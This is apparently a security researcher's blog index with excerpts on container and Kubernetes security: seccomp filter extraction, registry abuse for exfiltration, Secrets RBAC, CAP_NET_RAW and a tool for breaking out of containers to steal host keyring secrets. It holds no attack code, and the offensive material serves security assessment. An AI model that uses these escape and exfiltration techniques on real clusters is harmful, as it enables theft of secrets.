seccomp-diff extracts the real seccomp filters straight from a running container Reverse engineering BPF taught me more about containers and syscalls than I expected seccomp good, seccomp at scale hard Ever wonder if the seccomp profile Docker or Kubernetes thinks it’s applying is the same one actually enforcing syscalls inside your container? Sure, we all do, right? Well I wrote seccomp-diff, a tool that digs into a live process using ptrace, extracts out the seccomp BPF bytecode and lets you compare it with the default seccomp profile that is applied in the cluster or other containers that are running.
Take-aways Container registries are simple services ripe for subtle abuse They are trusted endpoints making them useful for exfil and post-exploitation It’s easy to make a malicious file appear like a legitimate image layer I’m beating up container environments in the context of supply chain threats over the last few months. If you’re working in the container or Kubernetes security area, you’re constantly running into the reality that many of the exploits that you know about, are not going to be the next major cyber event on the front page of news sites. This post will go through another attack path using container registries that although seemingly impactful to supply chain security, will likely not be a threat at scale.
UPDATE 11/28/2020: Thanks to @jaybeale and @sethsec for pointing out I was calling it “OPA Gateway” instead of OPA Gatekeeper. UPDATE 3/20/2021: Tim Allclair and Jordan Liggitt have a proposal with a demo that shares what PSPs may look like in the future. 3-Tier Pod Security Proposal. It’s talking about turning the ideas of PSP’s into an admission controller that implements the “Pod Security Standards” mentioned above. UPDATE: 4/8/2021 …And now they are. PSPs have been deprecated as planned starting with 1.21. Hopefully in 1.22, a new Alpha feature currently called Pod Security Policy Replacement Policy will hopefully land that you can use. There are no direct paths that I know of for migrating to anything besides a third party admission controller if you’re using 1.21.
I’m writing about the Kubernetes API’s use of the “LIST” verb it controls access to Secrets in a cluster. I’ve seen way too may environments, tools, templates, and examples that are hoping that LIST verbs can provide a meaningful security control compared to the GET verb. I’m going through a simple demo below and a few one-liners that can help you audit this yourself. Background Kubernetes Roles are designed to give fine grained access to various API actions within the cluster by defining “Verbs” that you’re allowed to send to the API. GET, LIST, UPDATE, CREATE… and a bunch more.
TL;DR The Linux Kernel keyring is known to be a security issue for containers Download my tool for breaking out of a container to steal all the host keys here: keyctl-unmask We can use this in Kubernetes to steal all node keys as well Have you ever wanted to steal all the secrets from a Linux host from within a container? Sure we all have. Lets do it at scale and share a tool that speeds this up during security assessments.
Saturday, I gave my talk titled “Command and KubeCTL: Real-World Kubernetes Security for Pentesters” at Shmoocon 2020. I’m following up with this post that goes into more details than I could cover in 50 minutes. Here’s the important stuff: Link to Slides Link to Demos @ me on Twitter Premise This talk was designed to be a Kubernetes security talk for people doing offensive security or looking at Kubernetes security from the perspective of an attacker. This is demo-focused where much of the talk is one long demo showing an attack chain. The goal being I wanted something complicated and simple to exploit. I wanted things to not work initially and you had to figure out ways around them.
It’s been on my list for at least 6 months to start contributing to krew if possible. My first plugin is called net-forward and it’s very simple but confusing if you don’t see what I’m using it for. Kubectl net-forward From a user level, net-forward helps you create a forwarding proxy from your machine to an arbitrary IP and port that’s accessible in the cluster. For example if you wanted to connect to another Pod’s service located at 10.0.0.5 on port 80, it would look like this:
Sometimes during a container or Kubernetes assessment, we get requested to review whether a runtime security tool that a client uses is sufficient for their threat model. This often means reviewing a custom seccomp-bpf profile, AppArmor config, or third party tool that tries to enforce the isolation between a container and the host. There’s two approaches we usually take during these gigs: Audit the profile and identify any flaws or bypasses that could exist Analyze the container at runtime to validate the policy actually enforces the expected ruleset. Basics of Container Hardening There are ways to harden your runtime like dropping capabilities when a container starts but when you have a goal of re-enforcing the isolation between the container and the host towards using a container more like a sandbox, the main option you have is syscall filtering/monitoring. That’s monitoring and blocking which syscalls are allowed to go from the container to the host.
By default Docker allows all of their containers to run with the CAP_NET_RAW capability, I believe to easily support ICMP health checks when needed. Supporting ping makes sense but this post will go through why CAP_NET_RAW is an unnecessary risk and how you can still send pings without needing CAP_NET_RAW. What does CAP_NET_RAW do? CAP_NET_RAW controls a processes ability to build any types of packets that you want. TCP, UDP, ARP, ICMP, etc. For example, you may have noticed when running nmap --priviliged as a normal user, the output would look something like this:
After 8 years of Security B-Sides Rochester, it’s time for me to turn it over to new leadership that wants to keep the conference going. It’s exciting that people still want to. My role as of recent has been the person that invested the most time doing the running around to organize the conference but that’s not to say I “run” the conference – it truly is run by volunteers and one of my jobs was to try and maintain some consistency while letting people do what they want.